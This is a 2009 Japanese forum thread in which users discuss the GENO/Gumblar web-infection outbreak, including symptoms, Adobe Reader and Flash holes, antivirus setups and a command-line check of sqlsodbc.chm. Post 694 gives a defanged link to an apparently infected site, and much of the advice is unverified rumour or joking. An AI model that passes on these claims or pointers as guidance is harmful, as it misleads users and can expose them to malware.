GENOウイルススレ ★4at SEC
GENOウイルススレ ★4 - 暇つぶし2ch542:名無しさん@お腹いっぱい。
09/05/16 00:58:02
Vistaもマックも目くそ鼻くそだろ

543:名無しさん@お腹いっぱい。
09/05/16 00:58:43
>>540
該当ファイルを右クリック→プロパティで見れないか?
それにしてもちょっと危ないなそれ
ソフト消えるとかは危険なにおい

544:名無しさん@お腹いっぱい。
09/05/16 00:59:05
readerアンインスコすればかなり感染率下がる?

545:名無しさん@お腹いっぱい。
09/05/16 00:59:49
>>540
タスクマネージャー見て増えたプロセスを右クリックで停止してcmd.exe使ってHDDからそのプロセスを消した後、システム復元かけてみたら?

546:名無しさん@お腹いっぱい。
09/05/16 01:00:01
>>540
>スタートアップに入れてたソフトがいきなり消えたり…

これはかなり疑わしい


547:名無しさん@お腹いっぱい。
09/05/16 01:01:50
こういうウィルス作る目的ってなんなんだろう

548:名無しさん@お腹いっぱい。
09/05/16 01:02:20
■現在、自作PC板ではアスペル(アスペルガー症候群)、
MACオタ、あっち糞、ダプオ(脱糞男)などの名で知られ、
AMD中傷を行っています。

549:名無しさん@お腹いっぱい。
09/05/16 01:02:45
・クレカ情報うまうま
・俺SUGEEE
・卒業制作

550:名無しさん@お腹いっぱい。
09/05/16 01:03:07
メモ

Firefox:
 noscriptを入れて信用できるサイト毎に許可してあげるのが無難

Opera9.xx:
 Operaは設定が少々ややこしいが、noscriptみたいなアドオンを入れなく
 ても似たような事ができる(以下参照)
 ウインドウ下部を右クリックしてカスタマイズを選ぶ
 ボタンタブに切り替える
 Java、JavaScript、Cookie、プラグイン、リファラなど好きな機能を選び
 ウインドウ下部にドラッグして置いていく
 これで好きなときに各機能をon/offしてWebを閲覧することができる(普
 段は全offにしておくことが望ましい)
 信頼できるサイト等、常に機能をonにしておきたいサイトはツール→クイ
 ック設定→サイト毎の設定でサイト毎に許可設定してあげればおk
 ↑のサイト設定の管理(削除・変更等)はツール→詳細設定→コンテンツ
 でできる

w3m:
 w3m本体とw3mが使ってるcygwin関連のDLL (cygcrypt,cygiconv,cygintl,
 cygssl,cygwin1)を同じフォルダに放り込んでおけばcygwinをインスコし
 なくてもw3mを使える(一部制限あり)
 読み物主体のWebを閲覧するならこれで見るのが安全(マイナーだしw)
 ちなみに\Documents and Settings\User\.w3m\にw3mの設定ファイルが作
 られる
 ねこだいすき

551:名無しさん@お腹いっぱい。
09/05/16 01:03:23
豚インフル騒ぎよりも恐ろしく感じる自分

552:名無しさん@お腹いっぱい。
09/05/16 01:03:49
>>512
政府関連やマスコミ関連サイトで大々的に感染して
やっと動くってところだろうな

553:名無しさん@お腹いっぱい。
09/05/16 01:04:15
>>500
readerなくて感染した例

554:名無しさん@お腹いっぱい。
09/05/16 01:04:53
>>538
いまのところ、強制ダウンロードさせられたウィルスファイルをAdobeの穴経由で
実行させられて、sqlsodbc.chmの改変と%Root%に不正ファイルをおいてドライバ
登録させられるってのが感染メカニズムだから、強制ダウンロードされたのが
制限ユーザなら、それから先のメカニズムは制限ユーザには実行できない
はずなのさ。

555:名無しさん@お腹いっぱい。
09/05/16 01:05:08
>>552
朝日でも感染すればいいのに・・・

556:名無しさん@お腹いっぱい。
09/05/16 01:05:24
そんなに怖いならネットに接続しなきゃいい

557:名無しさん@お腹いっぱい。
09/05/16 01:05:32
>>552
それじゃあ遅いのにね~
豚インフルも大変だとおもうけどこっちも報道して欲しいわ

558:名無しさん@お腹いっぱい。
09/05/16 01:07:21
>>513
すまん自己解決した IEではなくJane2chに設定したら飛ばずにアドレスの色が変わるだけで済んだ

559:名無しさん@お腹いっぱい。
09/05/16 01:07:25
前スレでAdobe Readerが勝手に起動したって書いたんだけど

・sqlsodbc.chmを改変 →一応ファイルサイズは50,727 bytes
・cmd.exe、regedit.exeが起動不能 →起動した
・一部のアンチウイルスソフトが更新不能 →ノートン2009は更新できてる
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト) →Windows Updateにアクセスできる
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集 →?
・Googleの検索結果を改竄(リンクを弄る) →怖くて飛べない
・explorer.exeや一部のブラウザが異常終了 →IE、firefox、operaは普通に終了できた
・Acrobatが勝手に起動 →★★★★★どのサイトかは覚えてないがAdobe Reader7.0が起動された★★★★★→Acrobat JavaScriptは切ってなかった
・PDFファイルやシステムファイルが増殖 →どこを確認すれば?
・CPU、メモリ使用率がUP →特に変化なし
・再起動時にBSOD →普通に再起動できた

ニフのオンラインスキャンもやってみたけど白でした
勝手にAdobe Readerが起動するのって検索結果に普通のpdfファイルが出てそれをクリックしたって事もあるんだよね?
どのサイトを見てた時なのか全然覚えてないのが何とも・・・

560:名無しさん@お腹いっぱい。
09/05/16 01:07:52
スレリンク(hack板)
あしたおっぱいバレー観に行くカナ 2171


561:名無しさん@お腹いっぱい。
09/05/16 01:08:06
対策をしてるとはいえお気に入りの所ががいつ感染してるかとおもうと…
正直豚よりこっちのが怖い
個人サイトではとりあえず宣伝してくれようとしてくれるみたいだけど
どこまで広がるもんかねえ

562:名無しさん@お腹いっぱい。
09/05/16 01:09:39
Adobe Reader入れてなくても感染するって
どこから?

563:名無しさん@お腹いっぱい。
09/05/16 01:10:39
Flashから

564:名無しさん@お腹いっぱい。
09/05/16 01:10:45
>>550
ねこだいすきww

565:名無しさん@お腹いっぱい。
09/05/16 01:11:28
自称玄人がいっぱいのスレw

566:名無しさん@お腹いっぱい。
09/05/16 01:12:19
色んなサイトがフラッシュつかってるから完全に消すことできないじゃないか

567:名無しさん@お腹いっぱい。
09/05/16 01:12:54
Adobe Reader消せば
とりあえず危険は半分

568:名無しさん@お腹いっぱい。
09/05/16 01:13:41
>>500
GENOとは無関係なんじゃね?
違うウィルスかも。

569:名無しさん@お腹いっぱい。
09/05/16 01:14:38
なんでadobeがいつも狙われてるの?

570:名無しさん@お腹いっぱい。
09/05/16 01:14:56
なんでもいいがIE8が安定しない

571:名無しさん@お腹いっぱい。
09/05/16 01:15:27

653 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 01:02:14
ウイルスごときでなんでここまで騒いでるのか分からん

658 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 01:12:07
>>653
ニートはネットがないと困るからだろw


572:名無しさん@お腹いっぱい。
09/05/16 01:16:18
ネット使わない仕事なんて今時あるの?

573:名無しさん@お腹いっぱい。
09/05/16 01:16:33
>>569
クソ高いソフトの値段に切れたとか

574:名無しさん@お腹いっぱい。
09/05/16 01:16:59
おまいら祭ですね

575:名無しさん@お腹いっぱい。
09/05/16 01:17:09
バックアップ取るくらいしか無いな
js切ったら動画見れないしw


576:名無しさん@お腹いっぱい。
09/05/16 01:17:31
>>565
>>565
>>565
>>565
>>565

577:名無しさん@お腹いっぱい。
09/05/16 01:17:54
>>571
クレカ情報筒抜けやら
自分のサイトで感染者ふやされたら嫌だろ普通

578:名無しさん@お腹いっぱい。
09/05/16 01:18:34
感染したか調べようと思ってavastインストールしたんだけど
再起動かかったら起動しなくなったorz
ビープ音が鳴ってるんだけどこれってパソコン自体の問題?
それとも感染したってこと?
ちなみにこれは別のパソコンから書き込んでます。

579:名無しさん@お腹いっぱい。
09/05/16 01:18:50
Adobe Reader最新版てヴァージョンなに?

580:名無しさん@お腹いっぱい。
09/05/16 01:18:55
今後の展開によってはν速民の「ニコニコにアクセスした形跡のあるパソコンが完全にぶっ壊れるウイルスでもないかしら」という願いがある意味実現したともいえるw

581:名無しさん@お腹いっぱい。
09/05/16 01:19:24
>>550
今回のは信用できるサイト閲覧も感染する可能性があるので困ってしまう。

w3mの他にもっとマイナーなHTML2と言うのがある。
Windowsへ何も考えずとも普通にインストール出来る。
但し使い心地はw3mより激しく悪し。

582:名無しさん@お腹いっぱい。
09/05/16 01:20:00
>>579
9.1.1

583:名無しさん@お腹いっぱい。
09/05/16 01:20:50
糞みたいな質問スルーしろよ

584:名無しさん@お腹いっぱい。
09/05/16 01:20:57
           ,-=;,
          {__7!
          〔_ラレ        ,、_,-‐y;
           `y"l       rヲレへシ'"
           iト-ヘ、      (_;フイ             r;_/iレソ
            l  'ヽ      ル ||                し ン′
              ヽ   ヽ     レ' ||!            人_フ
             V  ヽ,    |   |.| r‐-、=‐-、    _/ /
              ヽ   ヽ,  ト = }{i y=‐'~Y__ 〉  / /
               `i 、,  ヽ, }- ルハjト'`_ント∠-r'   シ´ ←Vista
                V   `;|   i∨  ̄~7  ン〈___/
                V丶  |   リ >,    ( _/ ,_
                 ヾ  {   ソ レ  ン ;_ン'" ,r" rn ゞミヽ
                  ゝ、ゝ = 〃ソノ__/   / y''J | \` ヽ
   rn,              rfレ`ー-=-‐''~ ̄   /`7  `、|  ヽ-'ヽ
  rJllル7       rnh;   l´ ´'リ  ,rn     / r'ン==ト、!__  V ヽ
  〉__ソ       ヾヽ``ij'l 〉 /、,ハjjj し'l mhレ'   /f, |リ<レ7,,m〉  |  |
  |  {   rfjn   ,;'V _ン',/ //〉r>,、__//リリ ト  〈 }'=‐' ソ 〉トii,_/  j

585:名無しさん@お腹いっぱい。
09/05/16 01:21:15
>>582
なんて不吉な数字なんだ

586:名無しさん@お腹いっぱい。
09/05/16 01:21:21
>>569
使ってる人が多ければそれだけ感染拡大するからじゃね?

587:名無しさん@お腹いっぱい。
09/05/16 01:23:25
ビープ音は長符と短符の組み合わせでエラーコードになってるから
どんな風に鳴ってるのか書いたら誰か教えてくれるよ
あとBIOSも

588:名無しさん@お腹いっぱい。
09/05/16 01:26:32
パソコンド素人なんだけど
Adobe readerとフラッシュリーダー最新にアップデートと
ジャバスクオフが対策ってかかれてたから
リーダーの9.1インストールしてきたんだけど
もしかしてリーダーもフラッシュもインストールしないほうがいいの?
両方ない場合pdfとフラッシュ何で再生してんだろ…

589:名無しさん@お腹いっぱい。
09/05/16 01:27:31
必要なら入れるしかないだろ

590:名無しさん@お腹いっぱい。
09/05/16 01:28:01
参考になるかどうか分からんけど

メインノート Vista Home Premium SP1 CPU Centurino Duo メモリ1G→2G積み替え
        Updateは NET Framework3.5 / IE8 以外のオプションも含めて最新
        Acrobat Reader / Flash Player 最新

FW OutPost Free + Windows FW (Comodo は相性悪くて断念、Online Armourはインスコしたことないのでコメント出来ず)

常駐 Avast!、AntiVir、AVG、A-Squared(去年キャンペーンで貰った一年有償版)、Windows Defender
    (競合は今のところなし ただAntiVirは キャンペーンで貰ったキーでPremium をインスコ直後に不具合発生、Freeに戻す
     ※avast!のWeb Guardが原因? 切って入れ直すか検討中)
URLリンク(www.dotup.org)

非常駐 Bitdefender cmd版 SuperAntiSpyware Ad-Aware AE(常駐 オフ) SpywareBlaseter Spybot(Tea-timerオフ)
     その他 Rootkit削除系ソフトもろもろ
ルータ Zilkon GumblarのURLはじく設定 (10個しか入れられないので危険度が高い 78~/94~/213~をメインに登録)+ヤバいポート塞ぐ

Hosts や A-Squared に危険サイト名を登録済

Firefox + Adblock Plus + No Script + Flash Killer (Adblock Plus に危険URL登録済) 
念のためOpera Turbo と Google Chromeもインスコ

以下明日以降やるつもり/検討中

OutPost を PC Tools に切り替えるか否か/PeerGuardian (Vista対応 Ver.)の導入
PARAGONでCとDドライブをイメージディスク化→外付HDDに保存/7月末に切れるA-Squredに代わって ThreatFire 導入
「AirG PC監視」 「フォルダ監視」(共にソフト名)、対キーロガーソフトの導入

サブノートのXP HOME SP3 celeron / 768M は AntiVir Premium(最近キャンペーンで貰った半年有償版)
+ ZoneAlarm Pro (去年キャンペーンで貰った一年有償版)の点以外は大体Vistaと同じ

591:名無しさん@お腹いっぱい。
09/05/16 01:28:06
>>547
カネと自尊心

592:578
09/05/16 01:28:15
>>587
ありがとうございます。
ビープ音はピーピーピーピーと4連続、これをずっと繰り返してます。
画面は真っ暗で何も起動しません。

593:名無しさん@お腹いっぱい。
09/05/16 01:28:35
>>588
フラッシュはインストールしなきゃ見れないよ
PDFも何かしらの閲覧ソフトがなきゃだめ
どれが安全というのは結局古かったら意味がないから
あんまりないとおもう

594:名無しさん@お腹いっぱい。
09/05/16 01:28:53
最近やたらとパソコン重いんだよな…大丈夫かな
今外出先で確認できんorz

595:名無しさん@お腹いっぱい。
09/05/16 01:28:56
カスペで何か出てきた…
スキャン終わるの怖い

596:名無しさん@お腹いっぱい。
09/05/16 01:29:34
>>547
ビジネスだね
ゾンビ化させてネットワーク作ってそれごとマーケットで
売られてたりするよ

597:名無しさん@お腹いっぱい。
09/05/16 01:29:43
チキン野郎ばっかり

598:名無しさん@お腹いっぱい。
09/05/16 01:31:13
>>592
BIOSなに?

599:名無しさん@お腹いっぱい。
09/05/16 01:31:31
なるほど
あっちの板から誘導するとこんなのが湧くわけか・・・

600:名無しさん@お腹いっぱい。
09/05/16 01:31:42
早めに報道されりゃ感染するパソコンも少なくなるだろうに

601:名無しさん@お腹いっぱい。
09/05/16 01:32:21
vistaにしよう
Silverlightにしよう

602:名無しさん@お腹いっぱい。
09/05/16 01:36:15
小林製薬覗いたから\(^o^)/
とおもったけどセフだったこえぇよー

603:名無しさん@お腹いっぱい。
09/05/16 01:37:06
>>593
なるほど
無知なうえノートン先生くらいしかないのに
よく感染してなかったな…

604:578
09/05/16 01:37:19
>>598
BIOSってパソコン起動しなくても調べられますか?
ぐぐってみたんですが
パソコンを起動してからの調べ方しか見つからなかったです。
初心者な質問で申し訳ありません。

605:名無しさん@お腹いっぱい。
09/05/16 01:37:49
酷い有様になってきてるね。
インフルエンザと一緒で初期対応を誤ると
あっという間に拡散して取り返しが付かなくなる良い例だ
GENOがもう少しまともな対応をしていれば
まだマシだったろうがもう手遅れ

606:名無しさん@お腹いっぱい。
09/05/16 01:39:40
>>597
豚乙

607:名無しさん@お腹いっぱい。
09/05/16 01:39:40
>>604
URLリンク(www.s124.net)
URLリンク(www.s124.net)
自分でコード表見た方が早いんじゃね
音は書き込めないしw

608:名無しさん@お腹いっぱい。
09/05/16 01:40:37
>>605
キャッシュ消して発言がもうアレすぎ

609:名無しさん@お腹いっぱい。
09/05/16 01:41:24
セキュ板とはとても思えんスレだなぁ

610:名無しさん@お腹いっぱい。
09/05/16 01:42:56
>>608
まるで豚インフルが確認された時のメキシコの対応のようだw

611:名無しさん@お腹いっぱい。
09/05/16 01:42:59
          /)             
           ///)      
          /,.=゙''"/           
   /     i f ,.r='"-‐'つ____   キャッシュ消しゃーいいんだよ!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /


612:名無しさん@お腹いっぱい。
09/05/16 01:43:24
>>604
筐体を開けてマザーボードを見ると
AwardとかAmiとかphoenixとか書かれているシーツつきROMがある。
ただしノートだと筐体開けると保障が聞かなくなる場合がある

613:名無しさん@お腹いっぱい。
09/05/16 01:45:28
環境作ったけど、テストするURLがわからん!

614:名無しさん@お腹いっぱい。
09/05/16 01:46:45
もしGENOに感染してれば、>>578さんがAdobe reader を介さないで感染した
初の表出例になるのかな。

615:578
09/05/16 01:49:33
今電源入れてみたら起動しました!
avastが今ウィルスチェックしてるのでそれが終わって
このウィルスのようだったら書き込みます。お騒がせしてすみませんでした。

616:名無しさん@お腹いっぱい。
09/05/16 01:50:20
ここIDねーのか・・・

617:名無しさん@お腹いっぱい。
09/05/16 01:50:40
                        ', ;l: ll kr'´ ィイィ彳彳彳彳
                         ヾ州ィイイィ彳彳彡彡彡
               _ __      ,′        ``ヾミミミ
            ,. '´;:.:.:.:.::::::::.:.:.``ヽ  ,′     -‐ミミヽ/ミミミミミ
         ,. '´..:.:.:,. -─‐‐- 、;;;:;:.:ヽ〈           ,′ミミミミヽ
         / .:.:.:.:.:.く        ``ヾ「ヽヽヾミニ二二ミヽ `ヾミミミ
       ./ .:.:.:.:::::::::::::〉  ∠二二ニ彡' V/ T TTにニニニニニニニニニ====
       / .:.:.:.:::::::::::::::/     -='ぐ  /   l ||¨´ ̄``       . :;
     / .:.:.:.::::::::::::::::/     '''´ ̄` /   `Y´           . ;..:    
    ,′.:.:.:.:::::::::::::〈          ヽ____ノ',           .;: .;:
    i .:.:.::::::::::::::::::::::',         ,;;;'ハミミミヽヽ        .,.:; .; :.;:.
      ',.:.:.:.:/´ ̄`ヽ;;;',        .;;;'  ``ヾミヽ j!     ,. ′.;: .;:. :
     ',.:.:.:ヽ い( ミj!              )ミミj 、 、 ', ., 、:, 、 .; :.
      ',;;;:;:;:入    _       ..:;.;:.:;..:`Y ミj!  、 、 ', ., 、:, 、
      ';;;:;:.:  `フ´  _ノ    . ;: .;: .; :. ;:. ;:.`Y´  、 、 ', ., 、:, ,. '´
       Lノ´ ̄  , ィ´  .:; .:; . ;:. ;:. ;: .;: .; :. ;:. ;} 、 、 ', ., 、:,,.: '´
      ノノ   ____\ ;.: .;: . :;. :;. :;. :; .;: .;: .;人 _; :; :; ィ´`ヾ
   ,.  '´         ̄ ̄``¨¨ー',:;;,,:,;:,;,. '´ /;;;;;;;;;;;;;;;/   ',


618:名無しさん@お腹いっぱい。
09/05/16 01:51:00
>>21
avastはヒューリスティック最大にしておかないとダメなんじゃなかったっけ
デフォルト設定だと普通に感染するでしょ?

619:名無しさん@お腹いっぱい。
09/05/16 01:51:26
うちのPC起動すると「ピッ」てビープ音する

620:名無しさん@お腹いっぱい。
09/05/16 01:52:07
>>615
感染してないことを祈るよ
もしadobe readerなしで感染してたらorz

621:名無しさん@お腹いっぱい。
09/05/16 01:52:45
>>618
>>21はテンプレ作成前の先走り汁ですね。
>>24とペアで参照のこと。

622:名無しさん@お腹いっぱい。
09/05/16 01:52:46
4回連続で鳴るって言ってるから
起動のときの音とは違うだろ

623:名無しさん@お腹いっぱい。
09/05/16 01:52:49
入れてるウィルスソフトアンインストールしてavast入れた方がいい?
共存はまずいんだよね?NOD32なんだが

624:名無しさん@お腹いっぱい。
09/05/16 01:53:47
メモリかなんかにホコリ溜まってるとか
なんかパーツが抜けかけてるとかじゃねーの

625:名無しさん@お腹いっぱい。
09/05/16 01:53:56
>>623
とりあえずそれ以外でできる最善の方法とってれば今の所は大丈夫そう

626:名無しさん@お腹いっぱい。
09/05/16 01:55:42
>>613
>>523

627:名無しさん@お腹いっぱい。
09/05/16 01:56:15
完全な予防ってVista以外じゃ出来ないのか…
こええなあ…

628:名無しさん@お腹いっぱい。
09/05/16 01:57:33
URLリンク(up2.pandoravote.net)

629:名無しさん@お腹いっぱい。
09/05/16 02:01:04
adobe readerの更新ページ死んでるんだけど?

630:名無しさん@お腹いっぱい。
09/05/16 02:02:43
VistaでもUAC切ってればだめんしょ?

631:名無しさん@お腹いっぱい。
09/05/16 02:03:38
●個人情報お祭り中●
docomo 2009夏モデル Part22
スレリンク(keitai板)

632:名無しさん@お腹いっぱい。
09/05/16 02:03:38
Adobe Reader/Acrobatの脆弱性対策を考える
URLリンク(internet.watch.impress.co.jp)

633:名無しさん@お腹いっぱい。
09/05/16 02:03:47
>>629
マジ?

634:名無しさん@お腹いっぱい。
09/05/16 02:06:05
勝手に改竄されるソースってどういうのかわかる?

635:名無しさん@お腹いっぱい。
09/05/16 02:06:10
リアルでも渡航歴のない人間が豚インフルに感染濃厚だって・・・

636:名無しさん@お腹いっぱい。
09/05/16 02:07:27
怖くてもう寝れねーーーーーーーーー

637:名無しさん@お腹いっぱい。
09/05/16 02:07:37
>>635
さっきテレビのニュース速報やってた

638:名無しさん@お腹いっぱい。
09/05/16 02:08:55
もう怖くてネットサーフィンできねぇ
しばらく専ブラ使って2ちゃんだけの生活にするか

639:名無しさん@お腹いっぱい。
09/05/16 02:09:53
Windowsなんか捨ててMacにしろ、な

640:名無しさん@お腹いっぱい。
09/05/16 02:10:08
ネットもお外も大変な事になってますな

641:名無しさん@お腹いっぱい。
09/05/16 02:10:21
GENOの鯖ってMacで感染したんじゃなかったっけ

642:名無しさん@お腹いっぱい。
09/05/16 02:11:14
Adobeはどうしようもないな

643:名無しさん@お腹いっぱい。
09/05/16 02:11:34
ネットゲームに関してはどうなのこれ

644:名無しさん@お腹いっぱい。
09/05/16 02:11:42
Macはウィルスに感染しないし
使い勝手もいい、それに目にもやさしいし
使いつづければ筋力もつく、最高だよ

645:名無しさん@お腹いっぱい。
09/05/16 02:12:09
同人スレみてきたけどこれもう相当数のサイトが感染してそうだな
1000じゃきかないか
グーグル使えねえよちきしょー

646:名無しさん@お腹いっぱい。
09/05/16 02:12:11
アドビスレ

647:名無しさん@お腹いっぱい。
09/05/16 02:12:34
Site Area Temporarily Unavailable

> システムメインテナンスのため本サービスを一時停止しております。ご利用の皆様には
> ご不便をおかけして大変申し訳ございません。メインテナンス作業が終り次第、
> サービスを開始できるよう準備を進めておりますので、今しばらくお待ち下さいますよう
> お願いいたします。

URLリンク(get.adobe.com)

648:名無しさん@お腹いっぱい。
09/05/16 02:13:16
vistaと7は大丈夫って聞いたけどそれは確定なの?
なんか三日前からパソコンくそ重いんだが…
守ってんのノートン先生だし不安すぎる

649:名無しさん@お腹いっぱい。
09/05/16 02:13:32
逃げたなアドビ

650:名無しさん@お腹いっぱい。
09/05/16 02:13:35
2ちゃんをjaneでやる分には問題ないよな・・・
詳しくないし万が一感染したら初期化とかめんどいし

651:名無しさん@お腹いっぱい。
09/05/16 02:13:58
静かになるまではネットは必要以上に使わないようにするか

652:名無しさん@お腹いっぱい。
09/05/16 02:14:03
>>644
恋人も出来るしな


653:名無しさん@お腹いっぱい。
09/05/16 02:14:45
いや恋人はできん

654:名無しさん@お腹いっぱい。
09/05/16 02:16:09
フラッシュとリーダーをアンインスコしたら平和にならね?

655:名無しさん@お腹いっぱい。
09/05/16 02:20:57
adoveが現行の9.1じゃなくて9のまんまなら大丈夫かね?
一応javaは切ったが

656:名無しさん@お腹いっぱい。
09/05/16 02:21:42
9.1がヤバイの?
古い方がいいの?

657:名無しさん@お腹いっぱい。
09/05/16 02:22:36
まるで初心者の駆け込み所

658:名無しさん@お腹いっぱい。
09/05/16 02:23:01
この脆弱性は、
Adobe ReaderおよびAdobe Acrobatの
現行バージョンであるバージョン9.1および
8.1.4と、
旧バージョン(7.1.1以前)に影響があり、
Windows版、Mac版、Linux版の
すべてが影響を受けるとしている

659:名無しさん@お腹いっぱい。
09/05/16 02:23:27
すこしはテンプレから嫁w

660:名無しさん@お腹いっぱい。
09/05/16 02:23:38
>>491
OSX10.4.11でact2の最新版のインターネットセキュリティバリアX5バックアップエディション使ってるけど
二週間ほど前にトロイの亜種に感染した。こんなの初めてだよまったく。
バックグラウンドから攻めてくるからウイルスバリアのログはまめにチェックした方がいい
あとsafari起動時にdockにエイリアスが立ち上がっては消え立ち上がっては消えと挙動不審になったり
偽装ソフトウエアアップデートの表示が現れ再起動してくださいと出るけど絶対再起動しちゃダメ。

661:名無しさん@お腹いっぱい。
09/05/16 02:23:46
本スレだからこっちで聞けとか言って
色々貼られてるししかたない

662:名無しさん@お腹いっぱい。
09/05/16 02:24:56
>>658
Acrobat Readerは?

663:名無しさん@お腹いっぱい。
09/05/16 02:26:24
あと半年もすれば賢い人らがどうにかしてくれぞガハハ

664:名無しさん@お腹いっぱい。
09/05/16 02:26:25
9.0ってどこで落とせるの?

665:名無しさん@お腹いっぱい。
09/05/16 02:27:25
91いれてからうpでーとで911にしろ

666:名無しさん@お腹いっぱい。
09/05/16 02:28:26
ちょ、スレ加速しすぎ
感染サイトが一気に増えて、被害者も急に増えたのか?

感染サイトを検索サイトで上位に来るように細工をする
感染サイトが正常であるかのごとく、検索サイトに表示されるように細工する
ってのがちょっと面白いな
サイト管理者としては、バレない・バックレ可能なら放置した方がメリットあるわけで。

被害者面して逆切れしてくる奴がいる以上、2chで晒して行くのが対抗策の一つかな


667:名無しさん@お腹いっぱい。
09/05/16 02:29:47
とりあえず下の1~3の手順を意味を理解しなくていいから実行するといいよ。

1.ウィンドウズキー(Windowsのマークのあるキー)を押しながらRキー を押す
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
 →背景が黒いウィンドウが開いた場合3へ
 →起動しない場合:感染疑い濃厚

3.背景が黒いウィンドウを選択。
  小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

  1個のファイル 50,727バイト と表示されればOK

なんかわかりやすかったから転載しておくね

668:名無しさん@お腹いっぱい。
09/05/16 02:30:02
肝心のうpデートのサイトが死んでるけどな

669:名無しさん@お腹いっぱい。
09/05/16 02:30:13
同人板でコピペまわってたからそれでここに辿り付いた
スレが加速したのはそのせいかと

670:名無しさん@お腹いっぱい。
09/05/16 02:31:10
一応感染してないみたいだけど、2ちゃんは開いてても大丈夫なの?
ニコとかpixivやばいなって書き込みあったけどしばらくは見ない方がいいんだろうか…

671:名無しさん@お腹いっぱい。
09/05/16 02:31:49
sqlsodbc.chmを見たら1323バイトなんだが感染してるのか…?
更新日時は2007年4月17日なんだけど

672:名無しさん@お腹いっぱい。
09/05/16 02:32:02
URLリンク(get.adobe.com)
URLリンク(get.adobe.com)

入れたらReaderはjavascriptを切るのじゃぞ

673:名無しさん@お腹いっぱい。
09/05/16 02:32:12
質悪いのに隠蔽ばっかで騒動にならないし、
むしろこの調子でガンガン初心者にも知識付いた方がいいだろう

674:名無しさん@お腹いっぱい。
09/05/16 02:32:48
もうね危ないからIEをアンインストールしたよ。
これで安心してネットができ……アレ?

675:名無しさん@お腹いっぱい。
09/05/16 02:33:02
>>672
入れてない奴はそもそも入れる必要ねぇだろ
入れてなきゃ大丈夫なんだし

676:名無しさん@お腹いっぱい。
09/05/16 02:33:29
神戸市民だけど何がなんだか

677:名無しさん@お腹いっぱい。
09/05/16 02:33:37
reader8.1.3だったんだが
これはセフセフか?

678:名無しさん@お腹いっぱい。
09/05/16 02:33:56
アップデートはどこですんの?

679:名無しさん@お腹いっぱい。
09/05/16 02:35:52
HTMLに挿入されるjavascriptってどんなのかわかる?
どういうのがあやしい記述なのかわからん

680:名無しさん@お腹いっぱい。
09/05/16 02:35:56
reader6.0.?だったけどうpデート出来ねえからアンインスコした

681:名無しさん@お腹いっぱい。
09/05/16 02:36:07
URLリンク(www.kaspersky.com)
でフルスキャンしてみれ

682:名無しさん@お腹いっぱい。
09/05/16 02:36:11
【レス抽出】
対象スレ:GENOウイルススレ ★4
キーワード:?

抽出レス数:164

683:名無しさん@お腹いっぱい。
09/05/16 02:37:28
URLリンク(www3.atword.jp)


684:名無しさん@お腹いっぱい。
09/05/16 02:37:55
>>671
自分も同じだ
cmd立ち上がらないし多分感染してる

685:名無しさん@お腹いっぱい。
09/05/16 02:38:47
>>679
それが気になる

686:名無しさん@お腹いっぱい。
09/05/16 02:39:33
別に同人サイトとか見てないし見る予定もないけどなんか怖いな
ひと段落するまではネサフやめるか

687:名無しさん@お腹いっぱい。
09/05/16 02:39:49
>>677
どう見てもold verです

688:名無しさん@お腹いっぱい。
09/05/16 02:40:24
>>671
>>684
アウト

689:名無しさん@お腹いっぱい。
09/05/16 02:40:42
同人ってちんこうpろだ?

690:名無しさん@お腹いっぱい。
09/05/16 02:41:09
同人サイトってなんなの?
どういうサイトのこと?

691:名無しさん@お腹いっぱい。
09/05/16 02:41:11
>>686
一般サイトも感染してんだろ?

692:名無しさん@お腹いっぱい。
09/05/16 02:41:25
Flashの最新って何?更新サイトつながらなくね?

693:名無しさん@お腹いっぱい。
09/05/16 02:42:03
>>688
うっは俺も\(^o^)/オワタ

694:名無しさん@お腹いっぱい。
09/05/16 02:42:26
同人スレより

335 名前:GENO[sage] 投稿日:2009/05/16(土) 02:10:10 ID:pp5Zm/yY0
>>303
感染しているサイトをSourceCheckerOn-lineでチェックしてみると、ほれ、この通り。

so.7walker.net/?site=hうtんtこp://asagaya-drum.com/

難読化されたJavaScriptが<BODY>の前に埋め込まれているのが分かるよね?


同人スレでは「うんこ」が抜けてたため踏んだ人多数
(すでにウィルスは駆除済みらしいが)


695:名無しさん@お腹いっぱい。
09/05/16 02:42:33
>>692 URLリンク(www.adobe.com)

696:名無しさん@お腹いっぱい。
09/05/16 02:42:41
俺もつながらねー
とりあえずavastならおk?

697:名無しさん@お腹いっぱい。
09/05/16 02:42:45
>>679,685
こういうの
URLリンク(detail.chiebukuro.yahoo.co.jp)

698:名無しさん@お腹いっぱい。
09/05/16 02:43:04
とりあえず下の1~3の手順を意味を理解しなくていいから実行するといいよ。

1.ウィンドウズキー(Windowsのマークのあるキー)を押しながらRキー を押す
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
 →背景が黒いウィンドウが開いた場合3へ
 →起動しない場合:感染疑い濃厚

3.背景が黒いウィンドウを選択。
  小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

  1個のファイル 50,727バイト と表示されればOK

なんかわかりやすかったから転載しておくね


之テンプレに入れようか?

699:名無しさん@お腹いっぱい。
09/05/16 02:43:22
>>696
このスレ最初から読めよ

700:名無しさん@お腹いっぱい。
09/05/16 02:44:09
adobe復活まだかYO

701:名無しさん@お腹いっぱい。
09/05/16 02:44:11
すいません Adobereader9.1.0しか見つからないんですけど
9.1.1ってどこにありますか?

702:名無しさん@お腹いっぱい。
09/05/16 02:44:25
同人スレより転載

【感染の確認方法】
①cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
 ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
 ■確認方法
 1.スタートから「ファイル名を指定して実行」
 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
   「regedit.exe」と入力して「OK」ボタンを押す。
   ※立ち上がったことを確認したら弄らず閉じること。
